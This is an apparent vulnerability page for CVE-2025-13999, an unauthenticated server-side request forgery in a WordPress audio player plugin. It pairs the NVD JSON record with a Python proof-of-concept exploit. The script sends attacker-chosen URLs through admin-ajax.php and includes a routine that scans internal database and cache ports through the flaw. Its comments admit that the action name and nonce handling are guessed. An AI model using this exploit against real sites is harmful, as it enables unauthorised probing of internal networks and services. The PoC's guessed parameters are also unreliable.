CVE-2025-13999

# CVE-2025-13999 SSRF PoC for WordPress HTML5 Audio Player Plugin # Affected versions: 2.4.0 to 2.5.1 # This PoC demonstrates the SSRF vulnerability in getIcyMetadata() function import requests import sys def exploit_ssrf(target_url, internal_target): """ Exploit SSRF vulnerability to make server request to internal resources Args: target_url: Target WordPress site URL internal_target: Internal resource to target (e.g., http://localhost, http://127.0.0.1) """ # The vulnerable endpoint is typically in the AJAX handler vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct the malicious request that triggers getIcyMetadata() # The function processes user-supplied URL without proper validation payload = { 'action': 'get_icy_metadata', # or similar AJAX action 'stream_url': internal_target, # attacker-controlled URL 'nonce': '' # may not be required for unauthenticated exploitation } try: print(f"[*] Sending SSRF payload to: {target_url}") print(f"[*] Targeting internal resource: {internal_target}") response = requests.post(vulnerable_endpoint, data=payload, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def scan_internal_services(target_url, internal_ip_range): """ Use SSRF to scan internal network services """ print(f"[*] Scanning internal network: {internal_ip_range}") common_ports = [80, 443, 8080, 3306, 5432, 6379, 27017] for port in common_ports: target = f"http://{internal_ip_range}:{port}" result = exploit_ssrf(target_url, target) if result and result.status_code != 0: print(f"[+] Service detected at port {port}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-13999.py <target_url> <internal_target>") print("Example: python cve-2025-13999.py http://example.com http://localhost:8080") sys.exit(1) target = sys.argv[1] internal = sys.argv[2] exploit_ssrf(target, internal)

{"cve": {"id": "CVE-2025-13999", "sourceIdentifier": "[email protected]", "published": "2025-12-19T07:16:00.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTML5 Audio Player – The Ultimate No-Code Podcast, MP3 & Audio Player plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions from 2.4.0 up to, and including, 2.5.1 via the getIcyMetadata() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old=3394789&old_path=html5-audio-player%2Ftags%2F2.5.1%2Finc%2FCore%2FAjax.php&new=3419843&new_path=html5-audio-player%2Ftags%2F2.5.2%2Finc%2FCore%2FAjax.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/989b4b9d-e22e-46a7-8ebc-5c8b33f98111?source=cve", "source": "[email protected]"}]}}